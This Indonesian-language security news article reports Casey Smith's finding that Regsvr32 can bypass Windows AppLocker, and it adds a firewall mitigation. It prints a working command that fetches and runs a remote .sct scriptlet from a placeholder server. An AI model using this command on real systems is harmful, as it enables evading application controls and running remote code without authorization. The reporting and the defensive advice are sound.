Peneliti menemukan kerentanan di Windows untuk melewati AppLocker

Casey Smith, seorang peneliti keamanan di Colorado, telah menemukan bahwa Regsvr32 dapat digunakan untuk melewati AppLocker di Windows.

AppLocker adalah fitur yang diperkenalkan di Windows 7 dan Windows Server 2008 R2 yang memungkinkan administrator menentukan pengguna atau grup mana yang dapat menjalankan aplikasi tertentu dalam organisasi berdasarkan identitas unik file. Jika Anda menggunakan AppLocker, Anda dapat membuat aturan untuk mengizinkan atau menolak aplikasi agar tidak berjalan.

Regsvr32 adalah utilitas baris perintah yang dapat digunakan untuk mendaftarkan dan membatalkan pendaftaran DLL. Dengan tekniknya, proses tidak mengubah registry sistem, sehingga akan sulit bagi admin untuk mengetahui apakah ada perubahan yang dilakukan pada sistem.

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

“Hal yang menakjubkan di sini adalah bahwa regsvr32 sudah mengetahui proxy, menggunakan TLS, mengikuti pengalihan, dll. … Dan … Anda dapat menebak biner MS default yang ditandatangani. Jadi, yang perlu Anda lakukan adalah meng-host file .sct Anda di lokasi yang Anda kendalikan,” tulis Smith.

Teknik ini tidak mengubah registri, tidak memerlukan hak administratif, dan skrip dapat dipanggil melalui HTTP atau HTTPS. Tidak ada tambalan yang tersedia untuk masalah keamanan ini dari Microsoft. Untuk saat ini, Anda dapat memblokir Regsvr32.exe dengan Windows Firewall.

Microsoft belum menanggapi tentang kerentanan serius ini. Kami akan memperbarui posting ini setelah kami mendengar dari Microsoft.